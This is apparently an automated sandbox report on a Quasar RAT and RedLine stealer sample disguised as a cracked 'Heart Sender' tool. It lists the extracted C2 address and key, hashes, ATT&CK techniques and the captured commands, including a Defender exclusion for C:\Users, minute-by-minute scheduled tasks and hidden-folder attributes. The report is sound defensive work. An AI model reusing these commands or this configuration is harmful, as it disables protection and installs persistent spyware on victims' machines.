quasar | d89a2246c6db2ec558bce3f1b3ca0cf32eb7dd9905b1ff30f802732434254c93

Analysis

max time kernel
149s
max time network
153s
platform
windows10_x64
resource
win10v20201028
submitted
09-03-2021 13:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Heart-Sender-V1.2_Cracked_by_JC0der-FireEye/Config/Config.bat

Score

10^/10

quasar redline heart infostealer persistence spyware stealer trojan upx

Malware Config

Extracted

Family

quasar

Version

1.3.0.0

Botnet

Heart

185.163.127.20:61110

Mutex

HRT_MUTEX_kecTsVDPnERdvianlr

Attributes

encryption_key
3vnM9JqtaSdxUVqeTXSi
install_name
Subfile.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Client Startup
subdirectory
SubDirr

Signatures

Quasar Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\SubDirr\Subfile.exe	family_quasar
C:\Users\Admin\AppData\Roaming\SubDirr\Subfile.exe	family_quasar

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

rl_trojan 1 IoCs

redline stealer.

stealer

Processes:

resource	yara_rule
behavioral2/memory/4496-38-0x00000000054F0000-0x00000000054F1000-memory.dmp	redline

ACProtect 1.3x - 1.4x DLL software 4 IoCs

Detects file using ACProtect software.

Processes:

resource	yara_rule
\Program Files\Common Files\System\symsrv.dll	acprotect
C:\Program Files\Common Files\System\symsrv.dll	acprotect
\Program Files\Common Files\System\symsrv.dll	acprotect
\Program Files\Common Files\System\symsrv.dll	acprotect

Executes dropped EXE 2 IoCs

Processes:

Subfile.exeSys32.exe

pid process

4496 Subfile.exe
4500 Sys32.exe
Modifies AppInit DLL entries 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

pid	process
4496	Subfile.exe
4500	Sys32.exe

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Program Files\Common Files\System\symsrv.dll	upx
C:\Program Files\Common Files\System\symsrv.dll	upx
\Program Files\Common Files\System\symsrv.dll	upx
C:\Users\Admin\AppData\Local\Temp\A1D26E2\81A97546CC.tmp	upx
\Program Files\Common Files\System\symsrv.dll	upx
C:\Users\Admin\AppData\Local\Temp\A1D26E2\835EB0C900.tmp	upx

Loads dropped DLL 3 IoCs

Processes:

Loader.exeLoader1.exeSubfile.exe

pid process

1740 Loader.exe
2304 Loader1.exe
4496 Subfile.exe
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Processes:

Subfile.exe

description ioc process

File opened (read-only) \??\e: Subfile.exe
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

16 ip-api.com

pid	process
1740	Loader.exe
2304	Loader1.exe
4496	Subfile.exe

description	ioc	process
File opened (read-only)	\??\e:	Subfile.exe

flow	ioc
16	ip-api.com

Drops file in Program Files directory 2 IoCs

Processes:

Loader.exeSubfile.exe

description	ioc	process
File created	C:\Program Files\Common Files\System\symsrv.dll	Loader.exe
File created	\??\c:\progra~1\common~1\system\symsrv.dll.000	Subfile.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1288 schtasks.exe
1432 schtasks.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

Sys32.exe

pid process

4500 Sys32.exe

pid	process
1288	schtasks.exe
1432	schtasks.exe

pid	process
4500	Sys32.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

powershell.exepowershell.exeSubfile.exe

pid	process
5080	powershell.exe
5080	powershell.exe
5080	powershell.exe
1016	powershell.exe
1016	powershell.exe
1016	powershell.exe
4496	Subfile.exe
4496	Subfile.exe
4496	Subfile.exe
4496	Subfile.exe
4496	Subfile.exe
4496	Subfile.exe

Suspicious use of AdjustPrivilegeToken 48 IoCs

Processes:

powershell.exepowershell.exeLoader.exeLoader1.exeSubfile.exe

description	pid	process
Token: SeDebugPrivilege	5080	powershell.exe
Token: SeIncreaseQuotaPrivilege	5080	powershell.exe
Token: SeSecurityPrivilege	5080	powershell.exe
Token: SeTakeOwnershipPrivilege	5080	powershell.exe
Token: SeLoadDriverPrivilege	5080	powershell.exe
Token: SeSystemProfilePrivilege	5080	powershell.exe
Token: SeSystemtimePrivilege	5080	powershell.exe
Token: SeProfSingleProcessPrivilege	5080	powershell.exe
Token: SeIncBasePriorityPrivilege	5080	powershell.exe
Token: SeCreatePagefilePrivilege	5080	powershell.exe
Token: SeBackupPrivilege	5080	powershell.exe
Token: SeRestorePrivilege	5080	powershell.exe
Token: SeShutdownPrivilege	5080	powershell.exe
Token: SeDebugPrivilege	5080	powershell.exe
Token: SeSystemEnvironmentPrivilege	5080	powershell.exe
Token: SeRemoteShutdownPrivilege	5080	powershell.exe
Token: SeUndockPrivilege	5080	powershell.exe
Token: SeManageVolumePrivilege	5080	powershell.exe
Token: 33	5080	powershell.exe
Token: 34	5080	powershell.exe
Token: 35	5080	powershell.exe
Token: 36	5080	powershell.exe
Token: SeDebugPrivilege	1016	powershell.exe
Token: SeIncreaseQuotaPrivilege	1016	powershell.exe
Token: SeSecurityPrivilege	1016	powershell.exe
Token: SeTakeOwnershipPrivilege	1016	powershell.exe
Token: SeLoadDriverPrivilege	1016	powershell.exe
Token: SeSystemProfilePrivilege	1016	powershell.exe
Token: SeSystemtimePrivilege	1016	powershell.exe
Token: SeProfSingleProcessPrivilege	1016	powershell.exe
Token: SeIncBasePriorityPrivilege	1016	powershell.exe
Token: SeCreatePagefilePrivilege	1016	powershell.exe
Token: SeBackupPrivilege	1016	powershell.exe
Token: SeRestorePrivilege	1016	powershell.exe
Token: SeShutdownPrivilege	1016	powershell.exe
Token: SeDebugPrivilege	1016	powershell.exe
Token: SeSystemEnvironmentPrivilege	1016	powershell.exe
Token: SeRemoteShutdownPrivilege	1016	powershell.exe
Token: SeUndockPrivilege	1016	powershell.exe
Token: SeManageVolumePrivilege	1016	powershell.exe
Token: 33	1016	powershell.exe
Token: 34	1016	powershell.exe
Token: 35	1016	powershell.exe
Token: 36	1016	powershell.exe
Token: SeDebugPrivilege	1740	Loader.exe
Token: SeDebugPrivilege	2304	Loader1.exe
Token: SeDebugPrivilege	4496	Subfile.exe
Token: SeDebugPrivilege	4496	Subfile.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Subfile.exe

pid process

4496 Subfile.exe

pid	process
4496	Subfile.exe

Suspicious use of WriteProcessMemory 16 IoCs

Processes:

cmd.exe

description	pid	process	target process
PID 4812 wrote to memory of 5080	4812	cmd.exe	powershell.exe
PID 4812 wrote to memory of 5080	4812	cmd.exe	powershell.exe
PID 4812 wrote to memory of 1016	4812	cmd.exe	powershell.exe
PID 4812 wrote to memory of 1016	4812	cmd.exe	powershell.exe
PID 4812 wrote to memory of 1288	4812	cmd.exe	schtasks.exe
PID 4812 wrote to memory of 1288	4812	cmd.exe	schtasks.exe
PID 4812 wrote to memory of 1432	4812	cmd.exe	schtasks.exe
PID 4812 wrote to memory of 1432	4812	cmd.exe	schtasks.exe
PID 4812 wrote to memory of 1608	4812	cmd.exe	attrib.exe
PID 4812 wrote to memory of 1608	4812	cmd.exe	attrib.exe
PID 4812 wrote to memory of 1740	4812	cmd.exe	Loader.exe
PID 4812 wrote to memory of 1740	4812	cmd.exe	Loader.exe
PID 4812 wrote to memory of 1740	4812	cmd.exe	Loader.exe
PID 4812 wrote to memory of 2304	4812	cmd.exe	Loader1.exe
PID 4812 wrote to memory of 2304	4812	cmd.exe	Loader1.exe
PID 4812 wrote to memory of 2304	4812	cmd.exe	Loader1.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

1608 attrib.exe

pid	process
1608	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Heart-Sender-V1.2_Cracked_by_JC0der-FireEye\Config\Config.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4812

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5080

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users" -force
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1016

C:\Windows\system32\schtasks.exe
schtasks /create /sc minute /mo 1 /tn "Microsoft\SubDir\Subfile0" /tr "C:\Users\Admin\AppData\Roaming\SubDirr\Subfile.exe" /RL HIGHEST /f
2⤵
- Creates scheduled task(s)
PID:1288

C:\Windows\system32\schtasks.exe
schtasks /create /sc minute /mo 1 /tn "Microsoft\SubDir\Subfile1" /tr "C:\Users\Admin\AppData\Roaming\SubDirr\Sys32.exe" /RL HIGHEST /f
2⤵
- Creates scheduled task(s)
PID:1432

C:\Windows\system32\attrib.exe
attrib +h +s C:\Users\Admin\AppData\Roaming\SubDirr
2⤵
- Views/modifies file attributes
PID:1608

C:\Users\Admin\AppData\Local\Temp\Heart-Sender-V1.2_Cracked_by_JC0der-FireEye\Config\Loader.exe
loader.exe -pP@$$W@RD@@
2⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:1740

C:\Users\Admin\AppData\Local\Temp\Heart-Sender-V1.2_Cracked_by_JC0der-FireEye\Config\Loader1.exe
loader1.exe -pP@$$W@RD@@
2⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2304

C:\Users\Admin\AppData\Roaming\SubDirr\Subfile.exe
C:\Users\Admin\AppData\Roaming\SubDirr\Subfile.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4496

C:\Users\Admin\AppData\Roaming\SubDirr\Sys32.exe
C:\Users\Admin\AppData\Roaming\SubDirr\Sys32.exe
1⤵
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
PID:4500

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Hidden Files and Directories

T1158

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Hidden Files and Directories

T1158

Credential Access

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Common Files\System\symsrv.dll
MD5
7574cf2c64f35161ab1292e2f532aabf

SHA1
14ba3fa927a06224dfe587014299e834def4644f

SHA256
de055a89de246e629a8694bde18af2b1605e4b9b493c7e4aef669dd67acf5085

SHA512
4db19f2d8d5bc1c7bbb812d3fa9c43b80fa22140b346d2760f090b73aed8a5177edb4bddc647a6ebd5a2db8565be5a1a36a602b0d759e38540d9a584ba5896ab

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
9df7f307a86ab2e65f83ea16549bdc13

SHA1
94bc3cdeb5d4521b81cad32ca4a7707b8a8205f3

SHA256
36effe36c710ccc2bb87572d4b4146ca01ab902805346c587e8cd729a5af4f6c

SHA512
413053b4bb6f372564fb129b3944cebc448a0fe82117c3202d63f6f00f05c9d6a47657b828895de49a1742e1d432ad86ad74fcb1693f5141ec1910ee57826795

Download Submit
C:\Users\Admin\AppData\Local\Temp\A1D26E2\81A97546CC.tmp
MD5
a0f5d9448eed029fef6d9944df015832

SHA1
560dc39fbdccf26465005baf60648d3e0e41b32a

SHA256
02d46c7d93d8be4e82fd29d9452203f86d75476dbfcc952efa63360a260fb242

SHA512
c41251267d6c42aa916df9e15304e839b0cb9087c834c9aa2a3b912b91c67ba1804e0a1854c64b14654d9ead03e1ed0e4a4ca3a4fd87616f7ad47c8edcec12d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\A1D26E2\835EB0C900.tmp
MD5
cb12a9883105636361815cc05ae84a9b

SHA1
e200f1b9553254dac2771c11e9c7eaf39095803c

SHA256
fb6f81aaf1dbe4cf4a182b2f049504c2b137cf714eacddf8debc7087d52414e7

SHA512
36dd29e931d771802e4f39ece4cb3ab6bff777457304d3242b88189ebd8a2650a68dba2b100309f6a5962af2d92416f91f0ad0e323e98d7276b2ecec0c657fec

Download Submit
C:\Users\Admin\AppData\Roaming\SubDirr\Subfile.exe
MD5
3e5da207d7655d267515b8fd7fe35b8a

SHA1
85a81b28b919d283c7ae1df1a6c8c45dc0ff756a

SHA256
db4b1a7399ad2e1fc3d8e64cb9e870a4b7f36ef629614517942a4b7318c29f42

SHA512
f097cfdaa714fe1dfcb360467010597015ba1ff4ca686d340d1775bdeadbe02d4d9ec064d78e20add0c29bd4f06f8ef9ee572f2374031a6313af2f7602c0530d

Download Submit
C:\Users\Admin\AppData\Roaming\SubDirr\Subfile.exe
MD5
3e5da207d7655d267515b8fd7fe35b8a

SHA1
85a81b28b919d283c7ae1df1a6c8c45dc0ff756a

SHA256
db4b1a7399ad2e1fc3d8e64cb9e870a4b7f36ef629614517942a4b7318c29f42

SHA512
f097cfdaa714fe1dfcb360467010597015ba1ff4ca686d340d1775bdeadbe02d4d9ec064d78e20add0c29bd4f06f8ef9ee572f2374031a6313af2f7602c0530d

Download Submit
C:\Users\Admin\AppData\Roaming\SubDirr\Sys32.exe
MD5
4fb7326fe1263d2f0626ee186195b891

SHA1
f2ceda16fe3ba9e90e2b17f77879278923fb3fe9

SHA256
d4641707fb9daa4f2e4e30f869a968f022f98c1067a9d8a9bd21ab22e56f82f4

SHA512
f4191396b94e1517af938a9ca6068686956e99b2bde98ed6dccc14c05ecf016c11a75010c5e911a52524886e9404cb001d68832230b15d455fab514ddd9fce7a

Download Submit
C:\Users\Admin\AppData\Roaming\SubDirr\Sys32.exe
MD5
4fb7326fe1263d2f0626ee186195b891

SHA1
f2ceda16fe3ba9e90e2b17f77879278923fb3fe9

SHA256
d4641707fb9daa4f2e4e30f869a968f022f98c1067a9d8a9bd21ab22e56f82f4

SHA512
f4191396b94e1517af938a9ca6068686956e99b2bde98ed6dccc14c05ecf016c11a75010c5e911a52524886e9404cb001d68832230b15d455fab514ddd9fce7a

Download Submit
\Program Files\Common Files\System\symsrv.dll
MD5
7574cf2c64f35161ab1292e2f532aabf

SHA1
14ba3fa927a06224dfe587014299e834def4644f

SHA256
de055a89de246e629a8694bde18af2b1605e4b9b493c7e4aef669dd67acf5085

SHA512
4db19f2d8d5bc1c7bbb812d3fa9c43b80fa22140b346d2760f090b73aed8a5177edb4bddc647a6ebd5a2db8565be5a1a36a602b0d759e38540d9a584ba5896ab

Download Submit
\Program Files\Common Files\System\symsrv.dll
MD5
7574cf2c64f35161ab1292e2f532aabf

SHA1
14ba3fa927a06224dfe587014299e834def4644f

SHA256
de055a89de246e629a8694bde18af2b1605e4b9b493c7e4aef669dd67acf5085

SHA512
4db19f2d8d5bc1c7bbb812d3fa9c43b80fa22140b346d2760f090b73aed8a5177edb4bddc647a6ebd5a2db8565be5a1a36a602b0d759e38540d9a584ba5896ab

Download Submit
\Program Files\Common Files\System\symsrv.dll
MD5
7574cf2c64f35161ab1292e2f532aabf

SHA1
14ba3fa927a06224dfe587014299e834def4644f

SHA256
de055a89de246e629a8694bde18af2b1605e4b9b493c7e4aef669dd67acf5085

SHA512
4db19f2d8d5bc1c7bbb812d3fa9c43b80fa22140b346d2760f090b73aed8a5177edb4bddc647a6ebd5a2db8565be5a1a36a602b0d759e38540d9a584ba5896ab

Download Submit
memory/1016-12-0x00000213C4EF0000-0x00000213C4EF2000-memory.dmp

Filesize
8KB

Download
memory/1016-17-0x00000213C4EF6000-0x00000213C4EF8000-memory.dmp

Filesize
8KB

Download
memory/1016-22-0x00000213C4EF8000-0x00000213C4EF9000-memory.dmp

Filesize
4KB

Download
memory/1016-13-0x00000213C4EF3000-0x00000213C4EF5000-memory.dmp

Filesize
8KB

Download
memory/1016-11-0x00007FFA613A0000-0x00007FFA61D8C000-memory.dmp

Filesize
9.9MB

Download
memory/1016-9-0x0000000000000000-mapping.dmp

Download
memory/1288-18-0x0000000000000000-mapping.dmp

Download
memory/1432-19-0x0000000000000000-mapping.dmp

Download
memory/1608-20-0x0000000000000000-mapping.dmp

Download
memory/1740-21-0x0000000000000000-mapping.dmp

Download
memory/2304-24-0x0000000000000000-mapping.dmp

Download
memory/4496-38-0x00000000054F0000-0x00000000054F1000-memory.dmp

Filesize
4KB

Download
memory/4496-48-0x00000000069E0000-0x00000000069E1000-memory.dmp

Filesize
4KB

Download
memory/4496-47-0x0000000006660000-0x0000000006661000-memory.dmp

Filesize
4KB

Download
memory/4496-46-0x0000000006290000-0x0000000006291000-memory.dmp

Filesize
4KB

Download
memory/4496-45-0x0000000005FB0000-0x0000000005FB1000-memory.dmp

Filesize
4KB

Download
memory/4496-44-0x0000000005980000-0x0000000005981000-memory.dmp

Filesize
4KB

Download
memory/4496-42-0x0000000005790000-0x0000000005791000-memory.dmp

Filesize
4KB

Download
memory/4496-41-0x0000000006D90000-0x0000000006D91000-memory.dmp

Filesize
4KB

Download
memory/4496-39-0x00000000007E0000-0x00000000007E1000-memory.dmp

Filesize
4KB

Download
memory/4496-37-0x0000000073A70000-0x000000007415E000-memory.dmp

Filesize
6.9MB

Download
memory/4500-43-0x000000001B5C0000-0x000000001B5C2000-memory.dmp

Filesize
8KB

Download
memory/4500-34-0x00000000008A0000-0x00000000008A1000-memory.dmp

Filesize
4KB

Download
memory/4500-31-0x00007FFA613A0000-0x00007FFA61D8C000-memory.dmp

Filesize
9.9MB

Download
memory/5080-3-0x00007FFA613A0000-0x00007FFA61D8C000-memory.dmp

Filesize
9.9MB

Download
memory/5080-4-0x0000022739370000-0x0000022739371000-memory.dmp

Filesize
4KB

Download
memory/5080-2-0x0000000000000000-mapping.dmp

Download
memory/5080-5-0x0000022736B00000-0x0000022736B02000-memory.dmp

Filesize
8KB

Download
memory/5080-7-0x0000022739520000-0x0000022739521000-memory.dmp

Filesize
4KB

Download
memory/5080-6-0x0000022736B03000-0x0000022736B05000-memory.dmp

Filesize
8KB

Download
memory/5080-8-0x0000022736B06000-0x0000022736B08000-memory.dmp

Filesize
8KB

Download